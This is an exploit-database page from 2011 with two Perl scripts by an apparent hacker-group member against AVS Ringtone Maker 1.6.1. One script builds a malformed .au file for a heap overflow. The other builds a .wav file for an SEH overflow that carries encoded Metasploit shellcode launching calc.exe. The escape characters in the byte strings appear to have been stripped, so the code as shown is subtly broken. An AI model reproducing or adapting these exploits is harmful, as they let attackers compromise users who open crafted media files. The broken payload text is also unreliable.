Home / exploits AVS Ringtone Maker 1.6.1 Overflow
Posted on 15 May 2011
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #!/usr/bin/perl system("cls"); sub logo(){ print q' 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 1 ______ 0 0 .-" "-. 1 1 / KedAns-Dz =-=-=-=-=-=-=-=-=-=-=-| 0 0 Algerian HaCker | | > Site : 1337day.com | 1 1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0 0 | )(_o/ o_)( | > ked-h@hotmail.com | 1 1 |/ / | =-=-=-=-=-=-=-=-=-=-=| 0 0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1 1 _ ) \_______\__|IIIIII|__/_______________________ 0 0 (_)@8@8{}<________|-IIIIII/-|________________________> 1 1 )_/ / 0 0 (@ `--------` © 2011, Inj3ct0r Team 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 0 AVS Ringtone Maker 1.6.1 (.au) Heap Overflow Exploit 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 '; } logo(); # --------- # AVS Ringtone Maker 1.6.1 (.au) Heap Overflow Exploit # Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com> # Tested in Windows XP sp3 Fr # special thanks to : Inj3ct0r Team + exploit-id Team # --------- # Creating The Bad File (.AU) And Opening ... my $AU = "x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01". "x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E". "x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22". "x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x66x66x66x00"; open (FILE,">> Ked.au"); # Bad File Here print FILE $AU; print " [+] File successfully created! "; close (FILE); #!/usr/bin/perl system("cls"); sub logo(){ print q' 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 1 ______ 0 0 .-" "-. 1 1 / KedAns-Dz =-=-=-=-=-=-=-=-=-=-=-| 0 0 Algerian HaCker | | > Site : 1337day.com | 1 1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0 0 | )(_o/ o_)( | > ked-h@hotmail.com | 1 1 |/ / | =-=-=-=-=-=-=-=-=-=-=| 0 0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1 1 _ ) \_______\__|IIIIII|__/_______________________ 0 0 (_)@8@8{}<________|-IIIIII/-|________________________> 1 1 )_/ / 0 0 (@ `--------` © 2011, Inj3ct0r Team 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 0 AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 '; } logo(); ### # Title : AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit # Author : KedAns-Dz # E-mail : ked-h@hotmail.com | ked-h@exploit-id.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com # Twitter page : twitter.com/kedans # platform : windows # Tested on : Windows XP sp3 FR ## # Drag And Drop This File to edit Window & Start Upload >> Bo0M CalC ! ### my $junk = "x41" x 4123 ; # Buffer Junk my $jump = "xebx06x90x90"; # Short Jump my $eip = pack("V", 0x00401E3C); # EIP my $seh = pack("V", 0x7C839AC0); # SEH # windows/exec - 511 bytes ( http://www.metasploit.com) # Encoder: x86/alpha_mixed # EXITFUNC=seh, CMD=calc.exe my $shellcode = "xe8x52xe6xffxffx90x90". "x56x54x58x36x33x30x56x58x48x34x39x48x48x48" . "x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" . "x51x51x44x44x44x64x33x36x46x46x46x46x54x58" . "x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" . "x38x39x49x49x49x49x49x49x49x49x49x49x49x49" . "x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" . "x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" . "x42x41x42x58x50x38x41x42x75x4ax49x4bx4cx49" . "x78x4dx59x47x70x43x30x43x30x43x50x4ex69x49" . "x75x46x51x4bx62x42x44x4ex6bx46x32x46x50x4c" . "x4bx43x62x44x4cx4cx4bx42x72x47x64x4ex6bx51" . "x62x51x38x44x4fx4ex57x43x7ax44x66x44x71x4b" . "x4fx45x61x49x50x4cx6cx45x6cx43x51x51x6cx46" . "x62x44x6cx51x30x49x51x48x4fx44x4dx47x71x49" . "x57x4ax42x4cx30x42x72x50x57x4cx4bx51x42x44" . "x50x4cx4bx51x52x45x6cx46x61x4ex30x4cx4bx47" . "x30x50x78x4dx55x49x50x42x54x43x7ax43x31x4a" . "x70x42x70x4cx4bx51x58x44x58x4ex6bx50x58x45" . "x70x46x61x4ex33x48x63x45x6cx50x49x4cx4bx44" . "x74x4cx4bx46x61x49x46x46x51x4bx4fx44x71x4f" . "x30x4ex4cx49x51x48x4fx44x4dx43x31x48x47x45" . "x68x49x70x42x55x49x64x43x33x51x6dx49x68x47" . "x4bx43x4dx47x54x51x65x4ax42x51x48x4cx4bx42" . "x78x51x34x47x71x4bx63x50x66x4cx4bx44x4cx50" . "x4bx4cx4bx50x58x47x6cx43x31x4ax73x4cx4bx43" . "x34x4ex6bx45x51x4ax70x4bx39x47x34x51x34x44" . "x64x51x4bx43x6bx43x51x46x39x50x5ax42x71x4b" . "x4fx4bx50x51x48x43x6fx42x7ax4ex6bx45x42x4a" . "x4bx4fx76x51x4dx50x6ax46x61x4cx4dx4fx75x48" . "x39x43x30x43x30x45x50x42x70x50x68x46x51x4e" . "x6bx42x4fx4ex67x49x6fx4ax75x4dx6bx49x6ex44" . "x4ex46x52x4ax4ax51x78x4ex46x4ax35x4dx6dx4f" . "x6dx49x6fx4ax75x45x6cx46x66x51x6cx44x4ax4f" . "x70x49x6bx49x70x42x55x46x65x4fx4bx50x47x45" . "x43x51x62x42x4fx43x5ax43x30x42x73x49x6fx4e" . "x35x42x43x45x31x50x6cx51x73x44x6ex43x55x51" . "x68x50x65x47x70x41x41"; my $exploit = $junk.$jump.$eip.$seh.$shellcode; open (FILE ,'> KedAns.wav'); print FILE $exploit; #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu # gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... # Exploit-Id Team : jos_ali_joe + Caddy-Dz + kaMtiEz (exploit-id.com) ...All * TreX (hotturks.org) # (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org) # www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ... #================================================================================================
